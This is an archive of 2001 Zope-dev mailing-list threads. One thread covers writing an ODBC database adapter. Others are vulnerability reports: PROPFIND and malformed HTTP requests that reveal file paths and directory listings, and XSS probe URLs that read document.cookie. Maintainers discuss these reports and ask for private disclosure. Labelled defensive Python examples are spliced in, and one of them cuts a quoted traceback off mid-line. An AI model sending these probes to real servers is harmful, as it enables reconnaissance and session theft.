[Zope-dev] questions about writing a DA

2001-09-23 Thread StevenLee

Hi, all

I have got several questions here, and maybe you can give me some advice.

What I am trying to do is write a product which can communicate with ODBC Socket
Server, a win32 server application that allows applications to have access to Data
Sources managed by the Windows ODBC Data Source Administrator. And now a class
written in Python can communicate with ODBC Socket Server.
BTW, the class mentioned above handles the connection to the server, sending SQL
statements, and receiving results.

As far as I know, in Zope, to access Data Sources, one must create a Database
Connection and ZSQL Methods associated with it to get the results. (But I have
doubts about this; IMHO, there must be some other way to do so, but what is it?)

Now, I am rather confused about how to solve the problem.
First, is what I need to write a DA, or just a common product?
Second, if it's a DA, how can I use the existing class? I have read the article named
"How to write a DA" in the how-tos, but it is quite abstract to me.
Third, where can I find more about the Database Connection and ZSQL Method? Especially
on how they work together to access databases.

OK, I am not sure whether I have made myself understood; in fact, I am not quite clear
myself. If you have any questions about that, I will reply ASAP.

Thanks for your great patience; I will be grateful if you can give me some advice.
Thank you!

Best Wishes

Yours sincerely,
Steven Lee


[Zope-dev] Vulnerability in Zope

2001-09-23 Thread ALife

Found vulnerability: retrieve a full path to local files in Zope.

---[ Example 1 (Linux):

telnet www.zope.org 80

PROPFIND / HTTP/1.0

F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css   /HEAD   BODY B
Bobo-Exception-Line: 369


...


 <!--
 Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.py, line 160, in mapply
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 112, in call_object
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
    (Object: Virtual)
 TypeError: (see above)

 -->
Host has closed connection.

---[ Example 2 (Linux):
telnet www.zope.com 80

 / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0


HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css   /HEAD   BODY B
Content-Length: 5845
Bobo-Exception-Line: 547

 ...

 <!--
 Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 173, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
  File /usr/loc
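As an added example (not code from the post or from Zope), the check an operator would run against their own server or front-end proxy to confirm that these Bobo-Exception-* headers and the appended traceback are stripped: it parses a raw response and reports which headers and filesystem paths it exposes. The response below is constructed, modelled on Example 2, with its body shortened.

```python
import re

# Headers Zope 2.3.x added to error responses; each discloses something
# about the installation (file path, exception class, line number).
LEAKY_HEADERS = ("bobo-exception-file", "bobo-exception-type",
                 "bobo-exception-value", "bobo-exception-line")

# Constructed sample, modelled on Example 2 in the post (path and line
# number copied from the transcript, body shortened).
SAMPLE_RESPONSE = (
    "HTTP/1.0 404 Not Found\r\n"
    "Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1\r\n"
    "Date: Fri, 21 Sep 2001 12:51:48 GMT\r\n"
    "Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/"
    "HTTPResponse.py\r\n"
    "Content-Type: text/html\r\n"
    "Bobo-Exception-Type: NotFound\r\n"
    "Content-Length: 5845\r\n"
    "Bobo-Exception-Line: 547\r\n"
    "\r\n"
    "<html><body>Site Error</body></html>\r\n"
    "<!--\r\nTraceback (innermost last):\r\n"
    "  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py,"
    " line 223, in publish_module\r\n-->\r\n"
)

# Constructed response from a front end that strips everything above.
CLEAN_RESPONSE = "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"

def split_response(raw):
    """Return (status_line, [(name_lower, value)], body). Folded continuation
    lines (leading whitespace) are joined onto the previous header."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body

def find_leaky_headers(raw):
    """Map each Bobo-Exception-* header present to its value(s)."""
    _, headers, _ = split_response(raw)
    leaks = {}
    for name, value in headers:
        if name in LEAKY_HEADERS:
            leaks.setdefault(name, []).append(value)
    return leaks

def leaked_paths(raw):
    """Absolute .py paths visible in the leaky headers or in a traceback
    appended to the body as an HTML comment."""
    _, _, body = split_response(raw)
    text = " ".join(v for vs in find_leaky_headers(raw).values() for v in vs)
    if "Traceback (innermost last)" in body:
        text += " " + body
    return sorted(set(re.findall(r"/(?:[\w.\-]+/)+[\w.\-]+\.py", text)))

def audit(raw):
    """One-line verdict to log when checking that a front end strips the
    headers and the traceback before the response leaves the site."""
    leaks = find_leaky_headers(raw)
    paths = leaked_paths(raw)
    if not leaks and not paths:
        return "clean"
    return "leaks %d header(s), %d path(s): %s" % (len(leaks), len(paths), ", ".join(paths))

if __name__ == "__main__":
    print(audit(SAMPLE_RESPONSE))
    print(audit(CLEAN_RESPONSE))
```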

Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Paul Everitt


Do others consider this a vulnerability?  While it reveals more 
information than people might want, I'm curious about scenarios under 
which it could be exploited.

If any of you know of something *specific*, meaning it's a genuinely 
exploitable vulnerability, please email me or Brian Lloyd 
([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.

--Paul

ALife wrote:

 Found vulnerability: retrieve a full path to local files in Zope.
 
 ---[ Example 1 (Linux):
 
 telnet www.zope.org 80
 
 PROPFIND / HTTP/1.0
 
 F
 G
 H
 J
 K
 L
 HTTP/1.0 500 Internal Server Error
 Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
 Date: Mon, 10 Sep 2001 15:38:59 GMT
 Content-Length: 7058
 Ms-Author-Via: DAV
 Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
 Bobo-Exception-Type: TypeError
 Content-Length: 7058
 Ms-Author-Via: DAV
 Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
 Bobo-Exception-Type: TypeError
 Content-Type: text/html
 Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css   /HEAD   BODY B
 Bobo-Exception-Line: 369
 
 
 ...
 
 
  <!--
  Traceback (innermost last):
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
   File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
     (Object: ApplicationDefaultPermissions)
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.py, line 160, in mapply
     (Object: PROPFIND)
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 112, in call_object
     (Object: PROPFIND)
   File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND
     (Object: ApplicationDefaultPermissions)
   File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
     (Object: Virtual)
  TypeError: (see above)
 
  -->
 Host has closed connection.
 
 ---[ Example 2 (Linux):
 telnet www.zope.com 80
 
  / HTTP/1.0
 or NOTREALCOMMAND / HTTP/1.0
 
 
 HTTP/1.0 404 Not Found
 Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
 Date: Fri, 21 Sep 2001 12:51:48 GMT
 Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py
 Content-Type: text/html
 Bobo-Exception-Type: NotFound
 Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css   /HEAD   BODY B
 Content-Length: 5845
 Bobo-Exception-Line: 547
 
  ... 
 
  <!--
  Traceback (innermost last):
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
   File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook

Re: [Zope-dev] questions about writing a DA

2001-09-23 Thread Paul Everitt


I just took a look at ODBC Socket Server, which I had never seen before. 
Pretty interesting!  Here are some comments.

1) It looks like socket server opens a new socket for processing every 
request.  In this respect, it goes against one of the benefits of 
database adapters, which keep a persistent connection.

2) Architecturally, socket server is very similar to web services.  See 
the fishbowl proposal at dev.zope.org for more info.  Thus, the approach 
that Zope would do for web services might have some similarity to what 
you'd like to do.  Alternatively, take a look at the adapter for 
Ultraseek search engine at 
http://www.zope.org/Members/brianh/UltraseekDA.  It gives a model that 
might be useful to you.

3) Zope's approach of having separate objects that handle database 
connections provides the benefit that regular objects can't just fire up 
socket connections.  You want a model that helps prevent all of Zope's 
threads from being stuck waiting on responses to socket requests.

4) SQL Methods provide some useful and important machinery for your 
socket server approach.  First, I think you want site developers to 
think your thing is exactly the same as a regular SQL Method.  Also:

   - You likely want to keep the arguments list approach, to
   prevent people from inserting malicious data into the SQL requests.

   - Even more than with current database adapters, you want to
   retain the caching feature in SQL Methods.

   - Shoving the results into the Recordset code is something
   you might want to keep.

   - Etc.

Good luck, this looks like a useful project!

--Paul

StevenLee wrote:

 Hi, all
 
 I have got several questions here, and maybe you can give me some advice.
 
 What I am trying to do is write a product which can communicate with ODBC Socket
 Server, a win32 server application that allows applications to have access to Data
 Sources managed by the Windows ODBC Data Source Administrator. And now a class
 written in Python can communicate with ODBC Socket Server.
 BTW, the class mentioned above handles the connection to the server, sending SQL
 statements, and receiving results.
 
 As far as I know, in Zope, to access Data Sources, one must create a Database
 Connection and ZSQL Methods associated with it to get the results. (But I have
 doubts about this; IMHO, there must be some other way to do so, but what is it?)
 
 Now, I am rather confused about how to solve the problem.
 First, is what I need to write a DA, or just a common product?
 Second, if it's a DA, how can I use the existing class? I have read the article named
 "How to write a DA" in the how-tos, but it is quite abstract to me.
 Third, where can I find more about the Database Connection and ZSQL Method? Especially
 on how they work together to access databases.
 
 OK, I am not sure whether I have made myself understood; in fact, I am not quite clear
 myself. If you have any questions about that, I will reply ASAP.
 
 Thanks for your great patience; I will be grateful if you can give me some advice.
 Thank you!
 
 Best Wishes
 
 Yours sincerely,
 Steven Lee
 




___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )
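Paul's point 4 in working form, as an added example that is neither Zope's SQL Method machinery, ODBC Socket Server's protocol nor Steven's class: a parser for a declared-arguments line in the shape of a SQL Method's `arguments` field (types reduced to `int` and `string`), a renderer that fills `:name` placeholders (an assumed syntax) only through the declared, typed converters so request data cannot alter the statement, and a time-bounded result cache sitting in front of a constructed stand-in for the socket round trip.

```python
import re
from collections import OrderedDict

# Type converters: each validates a request value and renders it as a SQL
# literal. Integers must parse; strings get embedded quotes doubled, so a
# value like "1 OR 1=1" never reaches an int placeholder as SQL text.
CONVERTERS = {
    "int": lambda v: str(int(v)),
    "string": lambda v: "'" + str(v).replace("'", "''") + "'",
}
_DECL_RE = re.compile(r"^(\w+)(?::(\w+))?$")

def parse_arguments(spec):
    """'cust_id:int name:string' -> [('cust_id', 'int'), ('name', 'string')].
    Same shape as a SQL Method's arguments line; untyped names are strings
    (defaults and the other ZSQL types are left out of this sketch)."""
    decls = []
    for token in spec.split():
        m = _DECL_RE.match(token)
        if not m or (m.group(2) or "string") not in CONVERTERS:
            raise ValueError("bad argument declaration: %r" % token)
        decls.append((m.group(1), m.group(2) or "string"))
    return decls

def render_sql(template, arg_spec, request):
    """Fill :name placeholders (syntax assumed here) only from declared
    arguments, each converted by its declared type. Undeclared placeholders
    and missing values are errors; extra request keys are ignored."""
    declared = dict(parse_arguments(arg_spec))
    def fill(m):
        name = m.group(1)
        if name not in declared:
            raise KeyError("placeholder :%s is not a declared argument" % name)
        if name not in request:
            raise KeyError("no value supplied for argument %s" % name)
        return CONVERTERS[declared[name]](request[name])
    return re.sub(r":(\w+)", fill, template)

def try_render(template, arg_spec, request):
    """render_sql, but None instead of an exception when input is rejected."""
    try:
        return render_sql(template, arg_spec, request)
    except (ValueError, KeyError):
        return None

class ResultCache:
    """Time-bounded cache keyed on the rendered SQL, the role the SQL Method
    cache plays here: a repeat within max_age skips the socket round trip."""
    def __init__(self, max_age, max_size=128):
        self.max_age, self.max_size = max_age, max_size
        self._items = OrderedDict()
    def get(self, sql, now):
        item = self._items.get(sql)
        if item is None or now - item[0] > self.max_age:
            self._items.pop(sql, None)
            return None
        return item[1]
    def put(self, sql, rows, now):
        self._items[sql] = (now, rows)
        while len(self._items) > self.max_size:
            self._items.popitem(last=False)

class CountingSender:
    """Stand-in for the socket round trip (constructed for this example):
    records every statement sent and answers with one canned row."""
    def __init__(self):
        self.sent = []
    def __call__(self, sql):
        self.sent.append(sql)
        return [("row-for", sql)]

def query(template, arg_spec, request, cache, send, now):
    """The adapter's hot path: render, consult the cache, else send once."""
    sql = render_sql(template, arg_spec, request)
    rows = cache.get(sql, now)
    if rows is None:
        rows = send(sql)
        cache.put(sql, rows, now)
    return sql, rows
```

A request value such as `"1 OR 1=1"` for an `int` argument is rejected by `int()` before any SQL is built, and a quote inside a `string` argument is doubled rather than terminating the literal.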



Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Jerome Alet

On Sun, Sep 23, 2001 at 10:36:33AM -0400, Paul Everitt wrote:
 
 Do others consider this a vulnerability?  While it reveals more 
 information than people might want, I'm curious about scenarios under 
 which it could be exploited.
 
 If any of you know of something *specific*, meaning it's a genuinely 
 exploitable vulnerability, please email me or Brian Lloyd 
 ([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.
 ...
 ...
  Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property

Think about social engineering.
Knowing this sort of thing, while this is not a vulnerability in itself,
allows everybody to remotely know where Data.fs is.

bye,

Jerome Alet





[Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread ALife


Example:

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

For example, an attacker might post a message like

Hello message board. This is a message.
   <SCRIPT>malicious code</SCRIPT>
This is the end of my message.

When a victim with scripts enabled in their browser reads this
message, the malicious code may be executed unexpectedly.
Scripting tags that can be embedded in this way include <SCRIPT>,
<OBJECT>, <APPLET>, and <EMBED>.






Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Chris Withers

 Do others consider this a vulnerability?

Yup... especially given the hard-coded (sigh) error page returned for
authentication error gives out this information :-(

Chris






Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Chris Withers

 Hello message board. This is a message.
    <SCRIPT>malicious code</SCRIPT>
 This is the end of my message.

I don't really see your point other than a carelessly implemented app may
expose these kinds of vulnerabilities. Python (and hence Zope) has a library
for stripping out this sort of malicious HTML.

Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this
can be used.

cheers,

Chris





[Zope-dev] Vulnerability: attacking can get file list and directory

2001-09-23 Thread ALife

Vulnerability: an attacker can get the file list and directory
Tested on Win32 platform

Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter
enter
enter

<list files and directory>

This was tested on my site:
security.instock.ru 8080





Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Oliver Bleutgen

Aargh, 
I sent that first to [EMAIL PROTECTED] ...

 Hello message board. This is a message.
    <SCRIPT>malicious code</SCRIPT>
 This is the end of my message.

 I don't really see your point other than a carelessly implemented app may
 expose these kind of vulnerabilities. Python (and hence Zope) has a
 library
 for stripping out this sort of malicious HTML.

 Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this
 can be used.

Umm, Chris,

you're right, but this example

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>

executes the script. I don't exactly see why/where, but I feel 
this really shouldn't happen. As I see it, it's more a problem 
of Zope's standard_error page, which constructs links to the 
classic Zope site. I don't see a Zope-specific bug here either.

cheers,
oliver






Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Andy McKay

Haven't we been complaining about this automatic appending of tracebacks for
a while? To me this is what log files are for, but I'm not sure what this
guy is on. I wouldn't count this as a security vulnerability.

- Original Message -
From: Chris Withers [EMAIL PROTECTED]
To: Paul Everitt [EMAIL PROTECTED]; ALife [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, September 23, 2001 10:44 AM
Subject: Re: [Zope-dev] Vulnerability in Zope


  Do others consider this a vulnerability?

 Yup... especially given the hard-coded (sigh) error page returned for
 authentication error gives out this information :-(

 Chris










Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Andy McKay

What does this have to do with Zope? It's down to an individual application.

- Original Message - 
From: ALife [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, September 23, 2001 10:23 AM
Subject: [Zope-dev] New: Cross Site Scripting vulnerability


 
 Example:
 
 http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
 http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
 http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>
 
 For example, an attacker might post a message like
 
 Hello message board. This is a message.
    <SCRIPT>malicious code</SCRIPT>
 This is the end of my message.
 
 When a victim with scripts enabled in their browser reads this
 message, the malicious code may be executed unexpectedly.
 Scripting tags that can be embedded in this way include <SCRIPT>,
 <OBJECT>, <APPLET>, and <EMBED>.
 
 
 
 





Re: [Zope-dev] DISCUSS: Community checkins for CVS

2001-09-23 Thread Joachim Werner

 I imagine that the group will decide rules on peer reviewing.  For
 comparison, the Mozilla group has very elaborate rules for checkins,
 while Python has pretty much an innocent until proven guilty culture.
 (That is, you check something in, and if somebody complains, it gets
 removed.)

 I don't think it is worthwhile trying to form these rules a priori.

That's fine. I just wanted to put it onto the agenda ...

  We need rules like NO FIXES BETWEEN FINAL BETA AND RELEASE (Absolutely
no
  fixes I mean) -- and those rules should apply to everybody.

 Again, we'll let the rules come out of the group.  For instance, what if
 an Emacs #foo.py# accidentally got checked in?  Would you really require
 another beta release for that?  Betas are a cost incurred by hundreds of
 people around the world.

My personal opinion is that, apart from the version number, a final beta
should be exactly the same as the actual release. Accidentally checked-in
stuff can cause accidents. So there is some reason for a careful release
policy.

But in your specific case, if the final beta that should lead to a release
has been actually released (and tagged in the CVS), how should somebody be
able to check something into it afterwards? That could only happen if there
are problems with the CVS configuration and usage I guess ...

 Ahh, the 'it's the Wiki's fault' argument.  I just checked the zip
 mailing list archive.  9 messages since Aug 1st.  So neither email nor
 Wiki are good choices.  Can you point to an example of a process that
 worked better for designing APIs?

I don't blame the Wiki in general. Wikis (together with mailing lists) are a
good start. Sometimes we'd just need real meetings on real conferences I
guess ...

Joachim





Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Martijn Pieters

 Example:

 http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
 http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
 http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

 For example, an attacker might post a message like

 Hello message board. This is a message.
    <SCRIPT>malicious code</SCRIPT>
 This is the end of my message.

 When a victim with scripts enabled in their browser reads this
 message, the malicious code may be executed unexpectedly.
 Scripting tags that can be embedded in this way include <SCRIPT>,
 <OBJECT>, <APPLET>, and <EMBED>.

First of all, I would appreciate it if you could send alleged security
problems to us in private, and not advertise these on a public mailing list.
I know that you had posted your previous 'discovery' to us in private some
time before you took it to the public lists, but the time given to us to
craft a response to your email was by far too short. One week would have
been the absolute minimum!

Secondly, could you in future also describe the exact problem in more
detail? I assume that you mean a malicious third party could in theory abuse
our server to create a page with malicious client-side code by crafting a
message on a message board or in an email, right? Your manner of posting
could suggest to others that the vulnerability lies with Zope itself, not
with browsers allowing malicious code via a generated web page.

Third, the 'classic.zope.org' link on the Zope.org error page has long been
overdue for removal, especially since classic is now down. I have removed
the auto-generated link to it.

--
Martijn Pieters
| Software Engineer  mailto:[EMAIL PROTECTED]
| Zope Corporation   http://www.zope.com/
| Creators of Zope   http://www.zope.org/
-
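The error-page problem Oliver and Martijn describe, as an added example that is not Zope's standard_error_message or any Zope.org code: a renderer that builds the "classic site" link straight from the requested path (assumed to be how the auto-generated link worked) next to one that percent-encodes the path in the href and HTML-escapes it in text. The sample path is taken from the first URL in ALife's post.

```python
import html
from urllib.parse import quote

# Constructed from the first example URL in the post.
SAMPLE_PATH = "/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>"

def render_not_found_vulnerable(path):
    """Echoes the request path verbatim into the page and the link, so a
    path carrying <SCRIPT> is emitted as live markup in the victim's browser."""
    return ('<p>The resource %s could not be found. '
            'Try <a href="http://classic.zope.org%s">the classic site</a>.</p>'
            % (path, path))

def encode_for_href(path):
    """Percent-encode everything but '/' so the path can neither close the
    attribute nor open a tag, then escape for the HTML attribute context."""
    return html.escape(quote(path, safe="/"), quote=True)

def render_not_found_hardened(path):
    """Same page, with the path escaped for each context it lands in."""
    return ('<p>The resource %s could not be found. '
            'Try <a href="http://classic.zope.org%s">the classic site</a>.</p>'
            % (html.escape(path, quote=True), encode_for_href(path)))

def contains_live_tag(markup, tag="script"):
    """Does an unescaped <tag opener survive in the rendered output?"""
    return ("<" + tag) in markup.lower()

if __name__ == "__main__":
    print(render_not_found_vulnerable(SAMPLE_PATH))
    print(render_not_found_hardened(SAMPLE_PATH))
```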





Re: [Zope-dev] Vulnerability: attacking can get file list and directory

2001-09-23 Thread Joachim Werner


 Vulnerability: an attacker can get the file list and directory
 Tested on Win32 platform

 Example:
 telnet zopeserver 8080
 PROPFIND / HTTP/1.0
 enter
 enter
 enter

 <list files and directory>

 This was tested on my site:
 security.instock.ru 8080

This one really seems to be the old 'WebDAV is not safe' one. I guess it has
been tackled already. You should be able to switch the file listing off for
the Anonymous User in Zope 2.4.1 ...

Joachim

